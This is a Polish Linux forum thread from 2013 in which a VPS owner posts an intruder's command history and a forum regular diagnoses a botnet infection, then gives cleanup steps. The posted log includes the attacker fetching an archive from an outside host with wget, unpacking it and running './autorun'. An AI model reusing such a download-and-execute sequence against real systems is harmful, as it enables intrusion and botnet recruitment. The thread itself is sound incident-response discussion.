Linux.pl »

Baza sprzętu »
Rozdajemy Linuksa »
Poczta Linux.pl »
Hosting Linux.pl »

Nowe posty

xx Nowa wersja libreoffice (1)
Dzisiaj o 18:22:49
xx Dystrybucja - środowisko graficzna dla amigowca (MUI) (4)
Dzisiaj o 12:14:25
xx Co to jest ? (1)
Dzisiaj o 11:52:50
xx Jaki kod błędu zwracać z kernela? (3)
2024-06-09, 12:29:22
xx Diablo 2 w OpenDiablo2 (4)
2024-06-07, 12:56:21
xx Chrome vs Firefox – która przeglądarka internetowa jest lepsza (3)
2024-06-05, 04:06:26
exclamation ePBF & Observability meetup in Warsaw (0)
2024-05-16, 08:51:28
xx Linux Mint 21.3 XFCE brak dźwieku po paru minutach (karta muzyczna zintegrowana) (6)
2024-05-15, 08:24:30
xx Webmin - nie mogę uruchomić lokalnie wirtualnego hosta (1)
2024-05-13, 17:06:50
xx Linux Mint 21.3 Virginia brak dźwięku (9)
2024-05-11, 12:41:15
« poprzedni następny »
Strony: [1]   Do dołu

Autor Wątek: Włam  (Przeczytany 3134 razy)

dupoglowa

  • Gość
Włam
« dnia: 2013-02-28, 18:30:09 »
Witam,
Mam VPS, który służy mi do testów i wlaśnie zauważyłem, że ktoś logował sie jako jeden z userów, rozpakował archiwum, odpalil pare swoich skryptów i poszedł. Czy ktoś może pomóc ustalić w celach edukacyjnych co sie wydarzyło?
Pozdrawiam
Zapisane

dupoglowa

  • Gość
Włam
« Odpowiedź #1 dnia: 2013-02-28, 18:52:29 »
Gosc opdalil:
w
uname -a
perl -v
passwd
wget costamcostam.ro
tar -zxvf unu.tgz
rm -rf unu.tgz
cd .s
ls
./autorun
less /etc/xinetd.conf
strings /sbin/* | grep host_access
su -
last
netstat
exit
Zapisane

Offline mateo86

  • Users
  • Guru
  • *****
  • Wiadomości: 647
    • Zobacz profil
Włam
« Odpowiedź #2 dnia: 2013-02-28, 18:56:58 »
W archiwum było kilka exploitów + kilka innych narzędzi za pomocą których próbował zdobyć uprawnienia roota.
Jeśli mu się to nie udało, poszedł sobie podłamany i kiedyś być może spróbuje wrócić z innymi narzędziami.
Jeśli mu się to udało, to być może zapewnił sobie dostęp do roota (zmieniając jego hasło), bądź jako zwykły użytkowniki z uprawnieniami roota zainstalował jakieś backdoory, trojany lub czort wie co jeszcze, za pomocą których będzie mógł w przyszłości tu wrócić, kontrolować Twojego VPS, podmieniać jego zawartośc, dołączyć go do swojego botneta lub czort wie co jeszcze - ciężko zgadywać, jak nie widzi się skryptów. Jak masz to archiwum to podrzuć, może ktoś wyjaśni co dokładnie zostało zrobione u Ciebie w systemie.

Daj cała komendę wget, dokładnie. Będzie można określić co jest w archiwum + skąd zostało pobrane.
Zapisane

dupoglowa

  • Gość
Włam
« Odpowiedź #3 dnia: 2013-02-28, 19:08:38 »
wget pwlamea.hi2.ro/unu.tgz
Ponad to netstat pokazuje, że mam ustanowione połączenie z tampa.fl.us.undernet.o:ircd
Zapisane

Offline mateo86

  • Users
  • Guru
  • *****
  • Wiadomości: 647
    • Zobacz profil
Włam
« Odpowiedź #4 dnia: 2013-02-28, 19:31:56 »
To znaczy, że atak był udany, zaraz zerknę to w tym archiwum jest. Prawdopodobnie należysz do któregoś z botnetów ;P
Zapisane

Offline mateo86

  • Users
  • Guru
  • *****
  • Wiadomości: 647
    • Zobacz profil
Włam
« Odpowiedź #5 dnia: 2013-02-28, 20:17:32 »
Ok, mam 2 dwie wiadomości dobrą i zła ;)
Zła jest taka, że Twój VPS jest jednym z wielu komputerów botnetu.

Dobra jest taka, że można sobie z tym bardzo łatwo poradzić ;)
Pewna niedogodność jest taka, że musisz to stosunkowo szybko wykonać, bo zostało wrzucone do crona automatyczne uruchamianie tych procesów co minutę.

Najpierw musisz zatrzymać uruchomione procesy:


Kod: [Zaznacz]
kill -- -sh
kill pico
Potem musisz usunąć katalog .s ze wszystkim co w nim jest
Kod: [Zaznacz]
rm -rf .s
Najlepiej zrobić to za pomocą jednego polecenia:
Kod: [Zaznacz]
kill -- -sh && kill pico && rm -rf .s
Wykonujesz to w swoim katalogo domowym.

Na koniec jeszcze musisz z crona wywalić uruchamianie programu .s/update - poczytaj o tym w sieci.
Jak tego nie zrobisz, to nic strasznego się nie stanie, będziesz otrzymywał tylko w logach błąd, że nie może znaleźć pliku.
Zapisane
Strony: [1]   Do góry
« poprzedni następny »